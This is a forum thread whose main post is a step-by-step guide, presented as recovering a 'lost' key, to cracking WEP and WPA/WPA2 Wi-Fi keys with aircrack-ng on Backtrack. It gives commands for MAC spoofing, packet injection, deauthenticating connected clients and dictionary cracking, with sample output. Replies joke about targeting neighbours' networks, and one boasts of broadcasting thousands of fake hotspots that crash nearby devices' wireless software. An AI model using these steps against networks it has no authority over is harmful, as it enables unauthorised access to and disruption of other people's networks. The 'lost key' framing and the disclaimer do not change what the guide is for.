Thread: How to retrieve a lost WEP OR WPA/WPA2 key using Backtrack.

Okay guys, thanks to my friends at xSellize, I'll show you how to retrieve a lost WEP or WPA key.

**I AM NOT SAYING THAT YOU SHOULD USE THIS FOR HACKING OTHER PEOPLES' NETWORKS; WHAT YOU DO WITH THESE INSTRUCTIONS ARE UP TO YOU.**

========================
INSTRUCTIONS FOR WEP KEY ONLY:
========================

1) First get Backtrack and burn the iso image onto a CD.

2) Boot your laptop/pc/mac from said CD.

3) Open a terminal window and follow the instructions below...

=============================
WEP cracking with aircrack-ng
=============================

-----------------------------------------------------------------------------------------------

(Puts wifi card into monitor mode and changes mac address)

airmon-ng stop eth1

ifconfig eth1 down

macchanger --mac 00:11:22:33:44:55 eth1

airmong-ng start eth1

------------------------------------------------------------------------------------------------
************************************************** ******************
**eth1 = wifi adapter, check by typing "iwconfig" to see what the adapter is named.
**
**macchanger = changes the mac address of the NIC, makes it easier to remember and input at a later stage.
**
**These commands stop the NIC eth1, if it was active, then takes it offline so the mac address can be changed and then its
**restarted in monitor mode.
************************************************** ******************
------------------------------------------------------------------------------------------------

(Searches and displays all Access Points, then targets specific AP and listens on that channel and saves data to a file)

airodump-ng eth1

*choose AP and press ctrl + c*

airodump-ng -c # -w filename --bssid "APbssid" eth1

------------------------------------------------------------------------------------------------
************************************************** ******************
**airodump-ng eth1 = Scans all networks using NIC eth1.
**
**ctrl + c = Stops the scan and returns to unput line.
**
**-c = channel target AP is on, if for example it was on channel 11, command used would be -c 11
**
**-w = file name to save data too, for example -w testfile would creat a file named testfile.
**
**-bssid = the bssid of the target AP, example -bssid f8:ba:4d:18:37
************************************************** ******************
------------------------------------------------------------------------------------------------

(Fake authentication with target AP)

*new terminal window/tab*

aireplay-ng -1 0 -a "APMAC" -h 00:11:22:33:44:55 eth1

------------------------------------------------------------------------------------------------
************************************************** ******************
**-1 = type of attack to use, in this case its 0 which is the authenticate.
**
**-a = specifies the target APs mac address.
**
**-h = Wifi cards mac address which was changed to 00:11:22:33:44:55 in previous commands.
************************************************** ******************
------------------------------------------------------------------------------------------------

(Packet injection attack)

*new terminal/tab*

aireplay-ng -3 -b "APMAC" -h 00:11:22:33:44:55 eth1

------------------------------------------------------------------------------------------------
************************************************** ******************
**-3 = type of attack, -3 is the packet injection attack.
**
**-b = specifies the target APs mac address.
**
**-h = Wifi cards mac address which was changed to 00:11:22:33:44:55 in previous commands.
************************************************** ******************
------------------------------------------------------------------------------------------------

(Decrypting the data collected to get the wep key)

*new terminal/tab*

aircrack-ng -n 64 --bssid "APMAC" filename-01.cap

------------------------------------------------------------------------------------------------
************************************************** ******************
**-n = encryption that AP uses, 48,64,128, example -n 64 is for 64bit wep encryption.
**
**--bssid = mac address of the target AP.
**
**filename-01.cap = the file that the data has been saved too. If you called it something different use that name instead.
**check the file name, usually has -01 added to the end, and uses the .cap file type
************************************************** ******************
------------------------------------------------------------------------------------------------

DONE! =D


HERE IS A LIST OF COMPATIBLE DRIVERS THAT YOU CAN USE:

Best cards to buy/use.

THIS WILL WORK ON WINDOWS/LINUX/MAC. JUST BOOT FROM THE CD.



XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX


============================
INSTRUCTIONS FOR WPA/WPA2 KEY ONLY:
============================

**NOTE: Before you do anything, read the first few steps of the WEP guide to get an idea of which software to use and how to use it.**

STEP 1: START THE WIRELESS INTERFACE IN MONITOR MODE.

The purpose of this step is to put your card into what is called monitor mode.
Monitor mode is the mode whereby your card can listen to every packet in the air.
Normally your card will only “hear” packets addressed to you.
By hearing every packet, we can later capture the WPA/WPA2 4-way handshake.
As well, it will allow us to optionally deauthenticate a wireless client in a later step.
These steps are mostly specific to the madwifi-ng driver - for other drivers, this procedure varies. (Most commonly, running the command “airmon-ng start ” is used to set up monitor mode.)

First stop ath0 by entering:

airmon-ng stop ath0

The system responds:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter “iwconfig” to ensure there are no other athX interfaces.
It should look similar to this:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

airmon-ng start wifi0 9

Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.

The system will respond:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that “ath0” is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter “iwconfig”.

The system will respond:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card.
It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.




STEP 2: START AIRODUMP-NG TO COLLECT AUTHENTICATION HANDSHAKE

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

• -c 9 is the channel for the wireless network
• --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
• -w psk is the file name prefix for the file which will contain the IVs.
• ath0 is the interface name.

Important: Do NOT use the ”--ivs” option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner.
This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

To see if you captured any handshake packets, there are two ways.
Watch the airodump-ng screen for ” WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner.
This means a four-way handshake was successfully captured. See just above for an example screenshot.

use Wireshark and apply a filter of “eapol”.
This displays only eapol packets you are interested in.
Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.




STEP 3: USE AIREPLAY-NG TO DEAUTHENTICATE THE WIRELESS CLIENT

This step is optional.
You only perform this step if you opted to actively speed up the process.
The other constraint is that there must be a wireless client currently associated with the AP.
If there is no wireless client currently associated with the AP, then move onto the next step and be patient.
Needless to say, if a wireless client shows up later, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP.
The wireless client will then hopefully reauthenticate with the AP.
The reauthentication is what generates the 4-way authentication handshake we are interested in collecting.
This is what we use to break the WPA/WPA2 pre-shared key.



Based on the output of airodump-ng in the previous step, you determine a client which is currently connected.
You need the MAC address for the following.
Open another console session and enter:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

• Where:
  
• -0 means deauthentication
• 1 is the number of deauths to send (you can send multiple if you wish)
• -a 00:14:6C:7E:40:80 is the MAC address of the access point
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
• ath0 is the interface name

Here is what the output looks like:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.




STEP 4: RUN AIRCRACK-NG TO CRACK THE PRE-SHARED KEY.

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key.
To do this, you need a dictionary of words as input.
Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - “password.lst”.
This file can be found in the “test” directory of the aircrack-ng source code.
The Wiki FAQ has an extensive list of dictionary sources.
You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng.
Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

• Where:

• 
  
• -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
• *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach.
When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key.
Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

PLEASE NOTE THAT SOMETIMES THIS WILL NOT WORK FIRST TIME, PLAY AROUND WITH IT. IT DOES WORK.

It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:

• Your monitor card must be in the same mode as the both the client and Access Point.
  So, for example, if your card was in “B” mode and the client/AP were using “G” mode, then you would not capture the handshake.
  This is especially important for new APs and clients which may be “turbo” mode and/or other new standards.
  Some drivers allow you to specify the mode.
  Also, iwconfig has an option “modulation” that can sometimes be used.
  Do “man iwconfig” to see the options for “modulation”.
  For information, 1, 2, 5.5 and 11Mbit are 'b', 6, 9, 12, 18, 24, 36, 48, 54Mbit are 'g'.

• Sometimes you also need to set the monitor-mode card to the same speed. IE auto, 1MB, 2MB, 11MB, 54MB, etc.

• Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying ”-c ” when you start airodump-ng.

• Be sure there are no connection managers running on your system. This can change channels and/or change mode without your knowledge.

• You are physically close enough to receive both access point and wireless client packets. The wireless card strength is typically less then the AP strength.

• Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close.

• Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.

• Ideally, connect and disconnect a wireless client normally to generate the handshake.

• If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate.
  Normally this is a single deauth packet.
  Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake.
  As well, use directed deauths, not broadcast.
  To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client.
  If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

• Try stopping the radio on the client station then restarting it.

• Make sure you are not running any other program/process that could interfere such as connection managers, Kismet, etc.

• Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem.
  Such as missing AP packets, missing client packets, etc.

HERE IS A LIST OF COMPATIBLE DRIVERS THAT YOU CAN USE:

Best cards to buy/use.

THIS WILL WORK ON WINDOWS/LINUX/MAC. JUST BOOT FROM THE CD

SUPPORTED ON WINDOWS/MAC/LINUX

YOU CAN USE JOHN THE RIPPER (JTR) TO GENERATE YOUR OWN LIST AND PIPE THEM INTO AIRCRACK-NG
IM NOT SURE ON HOW TO DO THIS!
John the Ripper password cracker

THIS IS THE END OF THE GUIDE. MOST OF THE CREDIT GOES TO MY BUDDIES AT XSELLIZE FOR THIS WONDERFULLY EASY-TO-FOLLOW TUTORIAL =].

HOPE YOU ENJOYED IT!

Jambalaya ^_____^

Backtrack is a really really fun disk to play around with. Just have to find a decent wireless card/device that works with it and you'll be able to do a ton of neat things.

I have a computer in the closet with a hi-gain attenta snaking through. With BackTrack I was able to create thousands of false hotspots with random names! So anyone trying to "War Drive" or jack my internet has to find the right hotspot first! Usually it just crashes some computers wireless connection programs when it sees that many hot spots all at once. Funny stuff.


Thanks for the Tut!

so since you use a dictionary, this would be useless if one had their password to be longer than almost any word and be full of symbols and numbers as well as letters?

... I'm quite sure this isn't an Oxford English dictionary we're talking about, here... XD

It's a dictionary containing preset keys, more or less... I can't explain it properly =////... Someone help? XD

I understand what it probably is, the default passwords or most commenly used passwords right? other than wep which has been shown to be insecure, wpa or wpa2 would take forever to crack if the network was secured with a key 64 characters long, right?

It would take a while, but it isn't undoable O_o.

WEP you can crack in minutes, WPA can be cracked with more work but WPA2 is near impossible or not even worth it considering the amount of time it would take to crack.

More info on how to crack WPA:

InformIT: Cracking Wi-Fi Protected Access (WPA), Part 1 > WPA Overview
InformIT: Cracking Wi-Fi Protected Access (WPA), Part 2 > Starting the Crack

the third last paragraph on page 2 of part 2 says to crack a wpa password it needs to be a weak password. So this could be hit and miss depending on how much time you have.

Yes, exactly. Hopefully your neighbors are tech-stupid XDDDD.

However, TONS of people still use WEP (over here, at least) for some reason, so that's good news =].